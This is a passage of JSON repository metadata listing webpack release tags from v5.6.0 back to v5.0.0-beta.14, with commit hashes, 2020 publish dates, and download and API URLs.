":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl"